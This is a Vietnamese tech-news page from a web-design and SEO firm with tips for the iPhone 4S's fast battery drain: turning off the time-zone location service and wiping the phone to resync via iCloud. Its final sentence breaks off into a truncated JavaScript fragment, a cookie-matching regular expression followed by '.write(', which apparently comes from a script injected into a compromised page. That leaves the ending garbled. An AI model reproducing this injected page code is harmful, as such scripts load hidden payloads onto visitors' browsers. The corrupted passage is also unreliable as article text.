Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Mẹo trị bệnh iPhone 4S ngốn pin nhanh

Mẹo trị bệnh iPhone 4S ngốn pin nhanh

Một số người dùng chiếc smartphone iPhone 4S đang lo lắng về việc chiếc máy nhanh bị hết pin. Sau đây là các bước để có thể khắc phục được tình trạng trên.

1. Tắt hệ thống định vi

Bạn nên tắt hệ thống định vị trên iPhone 4S

Có vẻ như hệ thống các dịch vụ định vị trong hệ điều hành iOS 5 là một trong những vấn đề cần thay đổi khi mà nhiều người đã phát hiện ra rằng, yếu tố “Setting Time Zone” trong mục Location Services của hệ sinh thái iOS dường như hoạt động ngay cả khi không cần thiết, và điều đó đã dẫn đến tình trạng pin bị tiệu hao nhanh chóng quá mức. Và để điều này không thể xảy ra, bạn hãy vào Settings > Location Services > System Services và tắt Setting time Zone.

2. Tính năng thiết lập múi giờ riêng

Tính năng thiết lập múi giờ riêng trên iPhone 4S sẽ tắt đi

Nếu như tắt tính năng “Setting Location Zone” thì đồng nghĩa với chiếc iPhone của bạn sẽ không còn thiết lập múi giờ riêng của nó khi bạn di chuyển, nhưng đây là những gì mà bạn sẽ gặp phải khi mà bạn muốn tăng thời gian sử dụng chiếc iPhone của bạn sau mỗi lần sạc. Phương pháp này đã được chứng minh trên nhiều model iPhone như iPhone 4S, iPhone 4 và iPhone 3GS. Tất cả chúng đều chứng mình là thời gian sử dụng được cải thiện đáng kể sau khi thực hiện sự thay đổi này.

3. Đồng bộ hóa dữ liệu thông qua iCloud

Đồng bộ hóa dữ liệu thông qua iCloud

Macworld đã nhận thấy rằng, việc đồng bộ các địa chỉ liên lạc trong iCloud cũng sẽ khiến cho nguồn pin bị hao nhanh chóng. Trong trường hợp đó, nếu bạn xóa sạch dữ liệu trên điện thoại, sau đó đồng bộ thông qua iCloud thì sẽ giải quyết được vấn đề. Một độc giả của PC World đã gặp phải vấn đề tương tự trên chiếc iPhone 4S và đã đưa nó đến Apple Store. Nhân viên của cửa hàng đã chẩn đoán bệnh, kiểm tra thiết bị và thấy quá trình quá trình nếu cho phép kết nối di động liên tục trong tình trạng khởi động lại máy bị trục trặc và nó khiến máy ngốn rất nhiều pin. Nhân viên này đã xóa hết dữ liệu trên chiếc iPhone và yêu cầu khách hàng không dùng chức năng phục hồi từ dữ liệu sao lưu mà thực hiện đồng bộ hóa thiết bị thông qua iCloud. Và sau khi thực hiện các thao tác trên, chiếc iPhone đã hoạt động rất tốt. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘